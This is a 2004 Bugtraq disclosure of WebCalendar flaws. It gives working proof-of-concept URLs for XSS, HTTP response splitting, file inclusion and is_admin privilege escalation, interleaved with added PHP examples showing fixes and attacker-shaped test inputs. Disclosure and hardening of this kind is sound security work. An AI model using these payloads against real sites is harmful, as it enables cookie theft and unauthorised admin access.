Multiple Vulnerabilities in WebCalendar

From: Joxean Koret (joxeankoret_at_yahoo.es)
Date: 11/10/04

    Date: 9 Nov 2004 23:06:06 -0000
    To: bugtraq@securityfocus.com
    
    

    ---------------------------------------------------------------------------
                  Multiple Vulnerabilities in WebCalendar
    ---------------------------------------------------------------------------
     
    Author: Jose Antonio Coret (Joxean Koret)
    Date: 2004
    Location: Basque Country
     
    ---------------------------------------------------------------------------
     
    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
    WebCalendar - Web Calendar Application
     
    WebCalendar is a PHP application used to
    maintain a calendar for a single user
    or an intranet group of users. It can also be
    configured as an event calendar.
     
    Web : http://webcalendar.sourceforge.net
     
    ---------------------------------------------------------------------------
     
    Vulnerabilities:
    ~~~~~~~~~~~~~~~~
     
    A. Cross Site Scripting Vulnerabilities in various scripts.
     
    A1. WebCalendar checks for the <script>any</script> form of XSS attack
    but does not check <img src>-based attacks. To test the vulnerabilities
    you can try the following POCs:
     
     
    http://>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001
     
    http://>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009
     
    http://>/demo/usersel.php?form=editentryform.elements[20];
    %0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2
     
    http://>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001
     
    http://>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
     
    http://>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>
     
    http://>/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>
    NOTE: Almost any GLOBAL parameter in this script is vulnerable.
     
     
    B. HTTP Response Splitting
     
    B1. Due to poor input validation in the script login.php, HTTP Response
    Splitting attacks are possible. You can try the vulnerability with the
    following POC:
     
    http://>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi
    to all
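The fix for B1 is to validate the redirect target before it is ever placed in a header. The following is an added example and not WebCalendar's own code; the function name `safe_return_path`, its fallback value and the test inputs are assumptions. It rejects anything carrying a control character (the CR/LF that the PoC uses to terminate the Location header) and, as a second step, confines the target to a relative path inside the application so the parameter cannot become an open redirect either.

```php
<?php
// Added example (not WebCalendar's code): validate a redirect target such as login.php's
// return_path before it reaches header(). Function and parameter names are assumptions.

function safe_return_path(string $candidate, string $fallback = 'index.php'): string
{
    // Any control character (CR, LF, NUL, ...) is what makes header injection possible:
    // the CRLF in the advisory's PoC ends the Location header and starts a second response.
    if (preg_match('/[\x00-\x1F\x7F]/', $candidate)) {
        return $fallback;
    }
    // Keep the target inside the application: a conservative character set, no leading slash,
    // no "//" (protocol-relative URL to another host) and no ".." (path traversal).
    // The first test also rejects the empty string, so $candidate[0] is safe to read afterwards.
    if (!preg_match('~^[A-Za-z0-9_./?=&%-]+$~', $candidate)
        || $candidate[0] === '/'
        || strpos($candidate, '//') !== false
        || strpos($candidate, '..') !== false) {
        return $fallback;
    }
    return $candidate;
}

// Constructed inputs shaped like the advisory's PoC, URL-decoded as PHP would see them in $_GET.
$tests = [
    'view_entry.php?id=41972&date=20041001',
    "\r\nContent-Length:0\r\n\r\nHTTP/1.1 200 OK\r\n\r\nContent-Type:text/html\r\nContent-Length:9\r\nHi to all",
    '//attacker.example/phish',
    '../../etc/passwd',
];
foreach ($tests as $t) {
    echo json_encode($t), ' -> ', safe_return_path($t), "\n";
}

// In the redirecting script only the validated value reaches header():
// header('Location: ' . safe_return_path($_GET['return_path'] ?? ''));
```

Of the four constructed inputs only the first survives; the other three are replaced by the fallback. Since PHP 5.1.2 `header()` itself refuses a value that contains a newline, so on current PHP the splitting part of B1 is stopped in the runtime, but validating the target is still the correct fix for the code the advisory describes, and it is what closes the open-redirect case that the runtime check does not cover.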
     
     
    C. Possible code execution
     
    C1. If an attacker is able to upload a file via FTP or another mechanism
    to the web directory, there is a flaw that allows executing any file in
    the web tree. To try the vulnerability you can try this URL:
     
    http://>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other
     
    Note: This is also, in effect, a full path disclosure.
     
    D. Full Path Disclosure
     
    D1. Because of poor validation of the parameter encoded_login in the PHP
    script validate.php, there is a vulnerability that reveals the full
    filesystem path of the script on the web server.
     
    http://>/demo/includes/validate.php?encoded_login=
    (Full Path Disclosure)
     
    E. Admin Privileges
     
    E1. To perform various actions you need to be the administrator of the
    WebCalendar application, but various scripts are vulnerable to Variable
    Poisoning attacks. Privilege escalation is possible using the following
    methods:
     
     
    Example 1 :
     
    You don't have permission:
     
    http://>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
     
    But using this you do:
     
    http://>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
     
    Example 2 :
     
    http://>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id=
     
    Example 3 :
     
    No permission ->
    http://webcalendar.sourceforge.net/demo/upcoming.php
    Permission Granted :) ->
    http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y
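Sections C and E have the same root cause: with register_globals=On, every request parameter becomes a PHP variable before the script runs, so an include selector such as `user_inc` or a privilege flag such as `is_admin` can be supplied by the client. The block below is an added example, not WebCalendar's code, showing the two hardening steps a defender applies for both; the function names, the session keys and the file names in the allowlist are assumptions.

```php
<?php
// Added example (not WebCalendar's code) covering sections C and E of the advisory.
// Function names, session keys and the allowlisted file names are assumptions.

// Section E: privilege flags are set unconditionally, then derived only from server-side state.
// Whatever the request carried in is_admin / is_nonuser_admin / is_assistant is overwritten here.
function load_privileges(array $session): array
{
    $priv = ['is_admin' => false, 'is_nonuser_admin' => false, 'is_assistant' => false];
    if (!empty($session['login'])) {
        // Hypothetical: in a real application these come from the user table for $session['login'].
        $priv['is_admin']     = !empty($session['user_is_admin']);
        $priv['is_assistant'] = !empty($session['user_is_assistant']);
    }
    return $priv;
}

// Section C: a variable that selects an include file is treated as an allowlist key,
// never as a path. Anything not on the list falls back to the default implementation,
// so an uploaded file elsewhere in the web tree can never be reached through it.
function resolve_user_inc(string $requested, string $baseDir): string
{
    $allowed = ['user.php', 'user-ldap.php', 'user-nis.php']; // hypothetical file names
    if (!in_array($requested, $allowed, true)) {
        $requested = 'user.php';
    }
    return $baseDir . '/' . $requested;
}

// Simulation of register_globals with constructed, attacker-shaped parameters:
// extract() turns the request array into variables just as register_globals would.
$_GET = ['is_admin' => 'true', 'user_inc' => '../../uploads/evil.txt'];
extract($_GET);                                   // $is_admin === 'true', $user_inc points outside includes/

$priv     = load_privileges(['login' => 'demo']); // constructed session; the request's is_admin is ignored
$is_admin = $priv['is_admin'];                    // overwritten with the server-side value (false)
$user_inc = resolve_user_inc($user_inc, __DIR__ . '/includes');   // collapses to .../includes/user.php

var_dump($is_admin);
echo $user_inc, "\n";
```

The point of the simulation is the order of operations: the client-supplied values exist when the script starts, and the only defence is that every security-relevant variable is assigned from trusted state before it is read. register_globals was removed in PHP 5.4; on builds that still have it, set it Off and initialise every variable explicitly anyway, because Example 3 above shows that even configuration flags like `public_access` are reachable the same way.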
     
    Notes
    ~~~~~
     
    The weak method used in the script functions.php to protect against XSS
    attacks is the following:
     
    // This code is a temporary hack to make the application work when
    // register_globals is set to Off in php.ini (the default setting in
    // PHP 4.2.0 and after).
    if ( ! empty ( $HTTP_GET_VARS ) ) {
      while (list($key, $val) = @each($HTTP_GET_VARS)) {
        // don't allow anything to have <script> in it...
        if ( ! is_array ( $val ) ) {
          if ( preg_match ( "/<\s*script/i", $val ) ) {
            echo "Security violation!"; exit;
          }
        }
      }
    }
     
    It is very easy to bypass these basic security checks by using
    Unicode-encoded strings, or any other valid XSS vector, such as
    <img src> attacks.
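To make the point of section A and of the note above concrete, the following added example (not WebCalendar's code) reproduces the quoted blacklist as a function and places it next to the defender's alternative, encoding on output with htmlspecialchars. The inputs are constructed to match the shape of the advisory's PoCs rather than being the live URLs; the function names are assumptions.

```php
<?php
// Added example (not WebCalendar's code): the functions.php blacklist reproduced as a
// function, compared with output encoding. Inputs are constructed from the PoC shapes.

// The check from functions.php: a blacklist applied to every GET value.
function blacklist_rejects(string $val): bool
{
    return preg_match('/<\s*script/i', $val) === 1;
}

// Output encoding for an HTML attribute value: every character that could close the
// attribute or the tag (", ', <, >, &) is escaped, whatever the input looked like.
function html_attr(string $val): string
{
    return htmlspecialchars($val, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: a benign id, the one form the blacklist knows about, the <img onload>
// form from the view_entry.php PoC, and the bare-attribute form from the datesel.php PoC.
$inputs = [
    'benign'     => '41972',
    'script tag' => '<script>alert(1)</script>',
    'img onload' => '"><img src=x onload=alert(document.cookie)>',
    'event attr' => '" onclick=alert(document.cookie) x="',
];

foreach ($inputs as $name => $val) {
    $verdict  = blacklist_rejects($val) ? 'blocked' : 'passes';
    // The value placed where a script would echo it, as the attribute of a form field.
    $rendered = '<input name="id" value="' . html_attr($val) . '">';
    printf("%-10s blacklist: %-7s encoded: %s\n", $name, $verdict, $rendered);
}
```

Only the `script tag` input trips the blacklist; the `img onload` and `event attr` inputs pass it unchanged, which is exactly the advisory's point, while htmlspecialchars renders all four as inert attribute text. Encoding has to happen at every output point and match that point's context: an attribute as here, element text, a JavaScript block (the context the usersel.php and datesel.php PoCs target) or a stylesheet (the styles.php case). A single blacklist on input cannot know which of those contexts a value will land in, which is why it cannot be made complete by adding more patterns.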
     
    More Notes
    ~~~~~~~~~~
     
    The developers of WebCalendar (in particular Jeff Hoover) have shown
    seriousness in their fixes and responses regarding these errors.
     
    The fix:
    ~~~~~~~~
     
    The problems have been fixed in the CVS repository.
     
    Disclaimer:
    ~~~~~~~~~~~
     
    The information in this advisory and any of its
    demonstrations is provided
    "as is" without any warranty of any kind.
     
    I am not liable for any direct or indirect damages
    caused as a result of
    using the information or demonstrations provided
    in any part of this
    advisory.
     
    ---------------------------------------------------------------------------
     
    Contact:
    ~~~~~~~~
     
            Joxean Koret at
    joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
     
     
     

